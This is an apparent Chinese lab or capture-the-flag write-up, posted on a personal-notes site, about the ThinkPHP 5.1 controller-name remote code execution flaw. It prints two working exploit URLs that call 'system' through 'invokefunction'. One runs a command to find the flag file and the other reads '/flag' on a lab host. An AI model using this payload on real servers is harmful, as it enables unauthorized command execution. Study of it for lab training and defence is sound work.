ThinkPHP5框架漏洞

新用户88342ytu 2021-09-09

展开全文

PHP_RCE

【实验原理】

ThinkPHP5框架底层对控制器名过滤不严，可以通过url调用到ThinkPHP框架内部的敏感函数，进而导致getshell漏洞。

【实验目的】

掌握框架漏洞

【实验环境】

Windows

【实验工具】

firefox

【实验步骤】

1.根据主页提示，可以发现网页使用的是ThinkPHP框架，版本为5.1

2.此版本存在getshell漏洞（百度一下poc一抓一大把）

3.查找flag

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

4.查看flag,如图所示

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

本站是提供个人知识管理的网络存储空间，所有内容均由用户发布，不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息，谨防诈骗。如发现有害或侵权内容，请点击一键举报。

转藏分享

QQ空间 QQ好友新浪微博微信

献花（0） +1

来自：新用户88342ytu > 《待分类》

举报/认领

0条评论

发表

请遵守用户评论公约

类似文章 更多

新用户88342ytu

关注对话

TA的最新馆藏

php代码审计总结（上）
《从0到1：CTFer成长之路》书籍配套题目 [第二章 web进阶]SSRF Training
perl脚本中GET命令执行漏洞（[HITCON 2017]SSRFme）
Struts-s2-045
[struts2]s2-013
[struts2]s2

喜欢该文的人也喜欢更多

热门阅读换一换